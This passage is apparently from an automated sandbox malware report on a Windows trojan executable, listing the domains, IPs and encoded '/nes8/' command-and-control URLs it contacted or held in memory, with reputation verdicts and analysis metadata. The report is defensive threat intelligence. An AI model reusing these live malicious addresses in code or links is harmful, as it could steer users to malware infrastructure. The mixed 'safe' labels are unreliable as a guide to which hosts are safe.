          http://www.incentiveexcellence.com0%Avira URL Cloudsafe
          http://www.linnus.shop0%Avira URL Cloudsafe
          http://www.linnus.shop/nes8/www.incentiveexcellence.com100%Avira URL Cloudmalware
          http://www.yaxin376.comReferer:0%Avira URL Cloudsafe
          http://www.jinglunqhd.com/nes8/www.hadafsazan.net100%Avira URL Cloudmalware
          www.n7m.tokyo/nes8/100%Avira URL Cloudmalware
          http://www.incentiveexcellence.com/nes8/100%Avira URL Cloudmalware
          http://www.hadafsazan.netReferer:0%Avira URL Cloudsafe
          http://www.enakslot.net/nes8/100%Avira URL Cloudmalware
          http://www.n7m.tokyo/nes8/www.jinglunqhd.com100%Avira URL Cloudmalware
          http://www.hadafsazan.net/nes8/www.naturetechvr.com100%Avira URL Cloudmalware
          http://www.wordybag.online/nes8/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          linnus.shop
          		2.57.90.16
          		truetrue
            		unknown
            www.incentiveexcellence.com
            		66.113.136.229
            		truetrue
              		unknown
              overdue.aliyun.com
              		170.33.13.246
              		truefalse
                		high
                www.linnus.shop
                		unknown
                		unknowntrue
                  		unknown
                  www.swegon.tech
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.incentiveexcellence.com/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.linnus.shop/nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6true
                    • Avira URL Cloud: malware
                    		unknown
                    www.n7m.tokyo/nes8/true
                    • Avira URL Cloud: malware
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.dietoll-official.siteReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hadafsazan.net/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.innovativanimal.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.marketproinv.info/nes8/www.prvtg.topexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.jinglunqhd.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.yaxin376.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.prvtg.top/nes8/www.innovativanimal.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.marketproinv.infoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.purityrecruitment.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.naturetechvr.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.marketproinv.info/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.hallmarklog.live/nes8/www.n7m.tokyoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.naturetechvr.com/nes8/explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.enakslot.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.purityrecruitment.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hallmarklog.liveexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.prvtg.top/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.dietoll-official.siteexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.linnus.shopReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.n7m.tokyoReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.swegon.tech/nes8/www.linnus.shopexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.incentiveexcellence.com/nes8/www.purityrecruitment.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://redirect.aaaq.com/header.htmlexplorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hallmarklog.liveReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.marketproinv.infoReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.enakslot.net/nes8/www.wordybag.onlineexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.dietoll-official.site/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.linnus.shop/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.swegon.techReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.prvtg.topReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.wordybag.onlineReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.comexplorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.wordybag.online/nes8/www.dietoll-official.siteexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.wordybag.onlineexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.jinglunqhd.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.innovativanimal.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.naturetechvr.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.yaxin376.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.purityrecruitment.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.572601902.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.335123598.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321913311.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586876911.000000000ED28000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://www.dietoll-official.site/nes8/www.hallmarklog.liveexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.jinglunqhd.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.yaxin376.com/nes8/www.enakslot.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.hallmarklog.live/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.n7m.tokyo/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.innovativanimal.com/nes8/www.yaxin376.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.innovativanimal.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorYSpCB8DEek.exefalse
                        		high
                        http://www.prvtg.topexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.hadafsazan.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.purityrecruitment.com/nes8/www.marketproinv.infoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.incentiveexcellence.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.n7m.tokyoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.swegon.techexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.swegon.tech/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.enakslot.netReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.incentiveexcellence.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.linnus.shop/nes8/www.incentiveexcellence.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.jinglunqhd.com/nes8/www.hadafsazan.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.yaxin376.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.linnus.shopexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.incentiveexcellence.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.hadafsazan.netReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.enakslot.net/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.n7m.tokyo/nes8/www.jinglunqhd.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.hadafsazan.net/nes8/www.naturetechvr.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.wordybag.online/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        170.33.13.246
                        		overdue.aliyun.comSingapore
                        		134963ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimitedfalse
                        2.57.90.16
                        		linnus.shopLithuania
                        		47583AS-HOSTINGERLTtrue
                        66.113.136.229
                        		www.incentiveexcellence.comUnited States
                        		3064AFFINITY-FTLUStrue

                        General Information

                        Joe Sandbox Version:37.0.0 Beryl
                        Analysis ID:825979
                        Start date and time:2023-03-14 07:24:16 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample file name:YSpCB8DEek.exe
                        Original Sample Name:d927de8cecb8523b956d2bb2098d20ef.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@10/5@4/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 66.6% (good quality ratio 63.3%)
                        • Quality average: 78.6%
                        • Quality standard deviation: 28.3%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 64
                        • Number of non-executed functions: 48
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: YSpCB8DEek.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        07:26:00API Interceptor630x Sleep call for process: explorer.exe modified

